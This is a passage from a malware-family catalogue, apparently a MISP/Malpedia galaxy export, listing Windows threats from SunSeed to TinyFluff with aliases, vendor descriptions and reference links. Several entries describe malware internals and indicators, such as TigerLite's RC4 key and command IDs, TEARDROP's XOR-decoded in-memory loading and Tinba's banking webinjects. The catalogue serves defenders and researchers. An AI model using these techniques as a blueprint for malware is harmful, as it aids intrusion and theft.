https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/

https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

SunSeed

According to Proofpoint, this is a Lua-based malware likely used by a nation-state-sponsored attacker to target European government personnel involved in managing the logistics of refugees fleeing Ukraine.

The tag is: misp-galaxy:malpedia="SunSeed"

SunSeed is also known as:

Table 4701. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sunseed

https://blogs.blackberry.com/en/2022/03/threat-thursday-sunseed-malware

https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails

SuperBear RAT

The tag is: misp-galaxy:malpedia="SuperBear RAT"

SuperBear RAT is also known as:

Table 4702. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.superbear

https://0x0v1.com/posts/superbear/superbear/

SUPERNOVA

According to CISA, SUPERNOVA is a malicious webshell backdoor that allows a remote operator to dynamically inject C# source code into a web portal to subsequently inject code. APT actors use SUPERNOVA to perform reconnaissance, conduct domain mapping, and steal sensitive information and credentials.

The tag is: misp-galaxy:malpedia="SUPERNOVA"

SUPERNOVA is also known as:

Table 4703. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova

https://unit42.paloaltonetworks.com/solarstorm-supernova

https://twitter.com/MalwareRE/status/1342888881373503488

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a

https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://github.com/fireeye/sunburst_countermeasures/pull/5

https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/

https://unit42.paloaltonetworks.com/solarstorm-supernova/

https://www.solarwinds.com/securityadvisory

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan

https://github.com/fireeye/sunburst_countermeasures

https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis

https://www.youtube.com/watch?v=7WX5fCEzTlA

https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://www.anquanke.com/post/id/226029

https://www.solarwinds.com/securityadvisory/faq

https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group

https://www.cisa.gov/news-events/analysis-reports/ar21-112a

https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html

https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html

surtr

According to PCrisk, Surtr is ransomware. Malware of this type encrypts files (and renames them) and generates a ransom note. Surtr appends the decryptmydata@mailfence.com email address and the ".SURT" extension to filenames.

The tag is: misp-galaxy:malpedia="surtr"

surtr is also known as:

Table 4705. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.surtr

https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/

SVCReady

According to PCrisk, SVCReady collects information about the infected system such as username, computer name, time zone, computer manufacturer, BIOS, and firmware. Also, it gathers lists of running processes and installed software. SVCReady sends collected data to the C2 server. Additionally, SVCReady attempts to maintain its foothold on the system by creating a scheduled task.

The tag is: misp-galaxy:malpedia="SVCReady"

SVCReady is also known as:

Table 4706. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready

https://www.socinvestigation.com/new-svcready-malware-loads-from-word-doc-properties-detection-response/

https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/

swen

The tag is: misp-galaxy:malpedia="swen"

swen is also known as:

Table 4707. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.swen

https://en.wikipedia.org/wiki/Swen_(computer_worm)

SwiftSlicer

According to ESET, this is a wiper written in Go that was deployed against a Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim’s Active Directory environment.

The tag is: misp-galaxy:malpedia="SwiftSlicer"

SwiftSlicer is also known as:

  • JaguarBlade

Table 4708. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer

https://twitter.com/ESETresearch/status/1618960022150729728

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.welivesecurity.com/2023/01/27/swiftslicer-new-destructive-wiper-malware-ukraine/

Synth Loader

The tag is: misp-galaxy:malpedia="Synth Loader"

Synth Loader is also known as:

Table 4714. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader

Syscon

SYSCON is a Remote Access Trojan used in a targeted campaign against US government agencies. It has recently been observed in conjunction with the CARROTBAT and CARROTBALL downloaders, and it uses the File Transfer Protocol as a Command and Control channel. Use of the family is attributed by Unit 42 to the Konni Group.

The tag is: misp-galaxy:malpedia="Syscon"

Syscon is also known as:

Table 4716. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon

https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/

http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

SysJoker (Windows)

Sysjoker is a backdoor malware that was first discovered in December 2021 by Intezer. It is sophisticated and written from scratch in C++. Sysjoker is a cross-platform malware that has Linux, Windows, and macOS variants. Possible attack vectors for Sysjoker are email attachments, malicious advertisements, and trojanized software.

The tag is: misp-galaxy:malpedia="SysJoker (Windows)"

SysJoker (Windows) is also known as:

Table 4718. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker

https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/

https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/

https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html

https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/

Sysraw Stealer

Sysraw stealer got its name because at some point it was started as "ZSysRaw\sysraw.exe". PDB strings suggest the name "Clipsa" though. The first stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggests that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named "1?[-+].dat" and POSTs them.

The tag is: misp-galaxy:malpedia="Sysraw Stealer"

Sysraw Stealer is also known as:

  • Clipsa

Table 4720. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer

https://decoded.avast.io/janrubin/clipsa-multipurpose-password-stealer/

https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/

Sysrv-hello (Windows)

Sysrv is cryptojacking malware written in Golang. There are Windows and Linux variants.

The tag is: misp-galaxy:malpedia="Sysrv-hello (Windows)"

Sysrv-hello (Windows) is also known as:

Table 4721. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sysrv_hello

https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/

https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet

SysScan

The tag is: misp-galaxy:malpedia="SysScan"

SysScan is also known as:

Table 4722. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan

SystemBC

SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on an underground marketplace, Proofpoint decided to call it SystemBC.

SystemBC had been observed occasionally before, but more prominently since June 2019. The first samples go back to October 2018.

The tag is: misp-galaxy:malpedia="SystemBC"

SystemBC is also known as:

  • Coroxy

  • DroxiDat

Table 4723. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

https://cyber.wtf/2023/02/09/defeating-vmprotects-latest-tricks/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c

https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/

https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/

https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6

https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes

https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/

https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits

https://community.riskiq.com/article/47766fbd

https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html

https://securelist.com/focus-on-droxidat-systembc/110302/

https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/

https://news.sophos.com/en-us/2020/12/16/systembc/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://www.bitsight.com/blog/emotet-botnet-rises-again

https://asec.ahnlab.com/en/33600/

https://docs.velociraptor.app/exchange/artifacts/pages/systembc/

https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/The%20Swiss%20Knife%20-%20SystemBC%20%7C%20Coroxy/The%20Swiss%20Knife-SystemBC_EN.pdf

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.reliaquest.com/blog/gootloader-infection-credential-access/

https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

Tandfuy

The tag is: misp-galaxy:malpedia="Tandfuy"

Tandfuy is also known as:

Table 4729. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy

Tapaoux

The tag is: misp-galaxy:malpedia="Tapaoux"

Tapaoux is also known as:

Table 4730. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux

TClient

Steve Miller pointed out that it is proxy-aware (Tencent) for C&C communication and uses wolfSSL, which makes it stick out.

The tag is: misp-galaxy:malpedia="TClient"

TClient is also known as:

  • FIRESHADOW

Table 4734. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient

https://twitter.com/stvemillertime/status/1266050369370677249

tDiscoverer

F-Secure described tDiscoverer (also known as HammerDuke) as interesting because it is written in .NET, and even more so because of its occasional use of Twitter as a C&C communication channel. Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands, but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date. If the account exists, HammerDuke will then search for tweets from that account with links to image files that contain embedded commands for the toolset to execute.

The tag is: misp-galaxy:malpedia="tDiscoverer"

tDiscoverer is also known as:

  • HAMMERTOSS

  • HammerDuke

Table 4735. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

https://securityintelligence.com/hammertoss-what-me-worry/

https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58

https://www.youtube.com/watch?v=UE9suwyuic8

TDTESS

The tag is: misp-galaxy:malpedia="TDTESS"

TDTESS is also known as:

Table 4736. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess

http://www.clearskysec.com/tulip/

TEARDROP

TEARDROP is a memory-only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\SOFTWARE\Microsoft\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.

The tag is: misp-galaxy:malpedia="TEARDROP"

TEARDROP is also known as:

Table 4738. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop

https://unit42.paloaltonetworks.com/atoms/solarphoenix/

https://www.youtube.com/watch?v=LA-XE5Jy2kU

https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline

https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds

https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more

https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf

https://www.mandiant.com/resources/unc2452-merged-into-apt29

https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/

https://twitter.com/TheEnergyStory/status/1342041055563313152

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate

https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack

https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html

https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware

https://twitter.com/TheEnergyStory/status/1346096298311741440

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b

https://github.com/fireeye/sunburst_countermeasures

https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/

https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

https://www.sans.org/webcasts/contrarian-view-solarwinds-119515

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/

https://twitter.com/craiu/status/1339954817247158272

https://www.brighttalk.com/webcast/7451/462719

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://www.youtube.com/watch?v=GfbxHy6xnbA

TefoSteal

The tag is: misp-galaxy:malpedia="TefoSteal"

TefoSteal is also known as:

Table 4739. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal

https://twitter.com/WDSecurity/status/1105990738993504256

TelAndExt

According to Check Point, this is a Telegram-focused infostealer (FTP / Delphi) used to target Iranian expats and dissidents.

The tag is: misp-galaxy:malpedia="TelAndExt"

TelAndExt is also known as:

Table 4740. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.telandext

https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/

TelB

According to Check Point, this is a Telegram-focused infostealer (SOAP / Delphi) used to target Iranian expats and dissidents.

The tag is: misp-galaxy:malpedia="TelB"

TelB is also known as:

Table 4741. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.telb

https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/

TelegramGrabber

The tag is: misp-galaxy:malpedia="TelegramGrabber"

TelegramGrabber is also known as:

Table 4744. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.telegram_grabber

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/old-cat-new-tricks.html

Telemiris

The tag is: misp-galaxy:malpedia="Telemiris"

Telemiris is also known as:

Table 4745. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.telemiris

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

Teleport

Cisco Talos reports that this is a data exfiltration tool used by TA505.

The tag is: misp-galaxy:malpedia="Teleport"

Teleport is also known as:

Table 4746. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

TellYouThePass

According to PCrisk, Tellyouthepass is one of many ransomware-type programs used to block access to files by encryption and keep them in this state unless a ransom is paid.

The program renames all encrypted files by adding the ".locked" extension and creates a ransom message in a text file called "README.html". For example, "1.jpg" is renamed by Tellyouthepass to "1.jpg.locked".

According to cyber criminals, this ransomware encrypts data using RSA-1024 and AES-256 cryptography algorithms.

The tag is: misp-galaxy:malpedia="TellYouThePass"

TellYouThePass is also known as:

Table 4747. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://www.crowdstrike.com/blog/tellyouthepass-ransomware-analysis-reveals-modern-reinterpretation-using-golang/

Tempedreve

The tag is: misp-galaxy:malpedia="Tempedreve"

Tempedreve is also known as:

Table 4748. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve

TempStealer

According to Cyble, this is a stealer targeting several cryptocurrency wallets along with browser data.

The tag is: misp-galaxy:malpedia="TempStealer"

TempStealer is also known as:

Table 4749. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer

https://blog.cyble.com/2022/10/20/infostealer-distributed-using-bundled-installer/

TerraRecon

According to QuoINT, TerraRecon is a reconnaissance tool that looks for specific pieces of hardware and software, targeting the retail and payment services sectors. Attributed to Golden Chickens.

The tag is: misp-galaxy:malpedia="TerraRecon"

TerraRecon is also known as:

  • Taurus Loader Reconnaissance Module

Table 4754. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_recon

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9

TerraStealer

According to QuoINT, TerraStealer (also known as SONE or StealerOne) is a generic reconnaissance tool, targeting, for example, email clients, web browsers, and file transfer utilities. Attributed to Golden Chickens.

The tag is: misp-galaxy:malpedia="TerraStealer"

TerraStealer is also known as:

  • SONE

  • StealerOne

  • Taurus Loader Stealer Module

Table 4755. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer

https://twitter.com/3xp0rtblog/status/1275746149719252992

https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9

https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

https://github.com/eset/malware-ioc/tree/master/evilnum

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

TerraTV

TerraTV is a custom DLL designed to hijack legitimate TeamViewer applications. It was discovered and documented by QuoINT. It has been attributed to the Golden Chickens malware-as-a-service group.

The tag is: misp-galaxy:malpedia="TerraTV"

TerraTV is also known as:

  • Taurus Loader TeamViewer Module

Table 4756. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

https://blog.minerva-labs.com/taurus-user-guided-infection

https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9

TFlower

TFlower is a new ransomware targeting mostly corporate networks, discovered in August 2019. It is reportedly installed on networks by attackers after they gain access via RDP. TFlower displays a console showing the activity being performed by the ransomware when it encrypts a machine, further indicating that this ransomware is triggered by the attacker post compromise, similar to Samsam/Samas in terms of TTP. Once encryption is started, the ransomware sends a status report to an apparently hard-coded C2. Shadow copies are deleted and the Windows 10 repair environment is disabled by this ransomware. This malware will also terminate any running Outlook.exe process so that the mail files can be encrypted. This ransomware does not add an extension to encrypted files, but prepends the marker "*tflower" and what may be the encrypted encryption key for the file to each affected file. Once encryption is completed, another status report is sent to the C2 server.

The tag is: misp-galaxy:malpedia="TFlower"

TFlower is also known as:

Table 4758. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower

https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/

https://www.sygnia.co/mata-framework

https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign

Thanatos

The tag is: misp-galaxy:malpedia="Thanatos"

Thanatos is also known as:

  • Alphabot

Table 4759. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos

https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market

ThinMon

The tag is: misp-galaxy:malpedia="ThinMon"

ThinMon is also known as:

Table 4761. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thinmon

https://mp.weixin.qq.com/s/nyxZFXgrtm2-tBiV3-wiMg

ThreeByte

The tag is: misp-galaxy:malpedia="ThreeByte"

ThreeByte is also known as:

Table 4762. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

ThumbThief

The tag is: misp-galaxy:malpedia="ThumbThief"

ThumbThief is also known as:

Table 4763. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief

http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/

Thunker

The tag is: misp-galaxy:malpedia="Thunker"

Thunker is also known as:

Table 4765. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker

TigerLite

TigerLite is a TCP downloader.

It creates mutexes like "qtrgads32" or "Microsoft32".

It uses RC4 with the key "MicrosoftCorporationValidation@#$%^&*()!US" for decryption of its character strings, and a custom algorithm for encryption and decryption of network traffic.

It supports from 5 up to 8 commands with the following identifiers: 1111, 1234, 2099/3333, 4444, 8877, 8888, 9876, 9999. The commands mostly perform various types of execution - either of code received from the server, or native Windows commands, with their output collected and sent back to the server.

TigerLite is an intermediate step of a multi-stage attack, in which Tiger RAT is usually the next step. This malware was observed in attacks against South Korean entities in H1 2021.

The tag is: misp-galaxy:malpedia="TigerLite"

TigerLite is also known as:

Table 4767. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite

https://www.malwarebytes.com/blog/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat

https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf

https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/

Tiger RAT

This is the third-stage backdoor mentioned in the Kaspersky blog, "Andariel evolves to target South Korea with ransomware". The third-stage payload was created via the second-stage payload, is interactively executed in the operation and exists in both x64 and x86 versions. Most samples use Internet Explorer or Google Chrome icons and corresponding file names to disguise themselves as legitimate internet browsers. The malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to decrypt the base64-encoded payload. The decrypted payload is another portable executable file that runs in memory. Before the payload is decrypted with the hardcoded XOR key, the backdoor also checks for a sandbox environment. The backdoor has some code overlap with the known malware family PEBBLEDASH, attributed to Lazarus/LABYRINTH CHOLLIMA.

The tag is: misp-galaxy:malpedia="Tiger RAT"

Tiger RAT is also known as:

Table 4768. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat

https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF

https://asec.ahnlab.com/en/56405/

https://www.brighttalk.com/webcast/18282/493986

https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html

https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/

https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html

https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf

https://asec.ahnlab.com/ko/56256/

https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf

https://asec.ahnlab.com/ko/58215/

https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf

tildeb

Standalone implant. Potentially tied to a framework called PATROLWAGON.

The tag is: misp-galaxy:malpedia="tildeb"

tildeb is also known as:

Table 4769. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb

https://documents.trendmicro.com/assets/tech-brief-tildeb-analyzing-the-18-year-old-implant-from-the-shadow-brokers-leak.pdf

Tinba

F-Secure notes that TinyBanker, or Tinba for short, is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe.

If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user’s browser activity and, if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc. in the legitimate-looking page.

Tinba may also display socially-engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.

The tag is: misp-galaxy:malpedia="Tinba"

Tinba is also known as:

  • Illi

  • TinyBanker

  • Zusy

Table 4770. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba

http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html

http://garage4hackers.com/entry.php?b=3086

https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/

https://adalogics.com/blog/the-state-of-advanced-code-injections

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/

https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant

http://www.theregister.co.uk/2012/06/04/small_banking_trojan/

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf

http://contagiodump.blogspot.com/2012/06/amazon.html

TinyFluff

TinyFluff is a dropper developed by the OldGremlin group. In one of their March '22 campaigns, TinyFluff included a JavaScript RAT with a time-independent DGA.

The tag is: misp-galaxy:malpedia="TinyFluff"

TinyFluff is also known as:

Table 4771. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff

https://www.group-ib.com/blog/oldgremlin-comeback/

TinyNuke

